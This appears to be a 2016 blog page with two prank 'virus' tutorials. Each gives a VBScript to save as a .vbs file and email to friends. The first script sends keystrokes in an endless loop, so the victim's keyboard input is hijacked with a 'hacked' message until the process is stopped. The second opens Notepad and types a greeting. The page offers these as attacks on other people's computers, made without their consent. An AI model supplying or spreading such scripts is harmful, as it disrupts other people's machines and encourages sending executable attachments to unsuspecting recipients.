Posts

Showing posts from July, 2016

Create a real virus to hack friend's keyboard function

Image
This trick can hack your friend's keyboard and make him type what you say. Just follow the step:<br /> Open Notepad, copy the code given below and save the file as virus.vbs --------------- Set wshShell = wscript.CreateObject ("WScript.Shell") do  wscript.sleep 100 wshshell.sendkeys "HI I AM YOUR NAME. I HACKED YOUR COMPUTER " loop Send this file to your friends in email. When they open it, he is hacked.

Type any message in notepad automatically and scare your friends :

Open Notepad and type the following code WScript.Sleep 1000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "w a" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "m g" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! "     Now save it as abc.vbs     And send it to your friends.